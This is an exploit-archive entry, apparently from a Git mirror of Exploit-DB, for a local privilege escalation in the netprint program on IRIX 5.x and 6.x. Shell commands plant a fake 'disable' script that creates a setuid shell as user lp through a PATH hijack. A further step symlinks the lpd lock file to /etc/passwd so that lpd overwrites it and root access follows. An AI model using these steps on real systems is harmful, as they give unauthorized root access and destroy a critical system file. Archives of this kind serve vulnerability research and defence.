bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/irix/local/19313.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

14 lines
No EOL
877 B
Text
Raw Permalink Blame History

source: https://www.securityfocus.com/bid/395/info
A vulnerability exists in the netprint program, shipping with Irix 6.x and 5.x by Silicon Graphics. The netprint program calls the "disable" command via a system() call, without specifying an explicit path. Therefore, any program in the path named disable can be executed as user lp.
% cat > /tmp/disable
cp /bin/sh /tmp/lpshell
chmod 4755 /tmp/lpshell
^D
% set path=(. $path)
% netprint -n blah -h blah -p blah 1-234
% /tmp/lpshell
However, one can go further if BSD printing subsystem is installed. /usr/spool/lpd is owned by lp, and it's the place where lpd writes lock file. lpd is also root/suid. So one replaces /usr/spool/lpd/lpd.lock with a symlink to /etc/passwd and runs lpd, passwd gets nuked. Then one repeats netprint trick, and, voila, disable now runs as root, because lp is not found in passwd. Kinda neat.
Reference in a new issue View git blame Copy permalink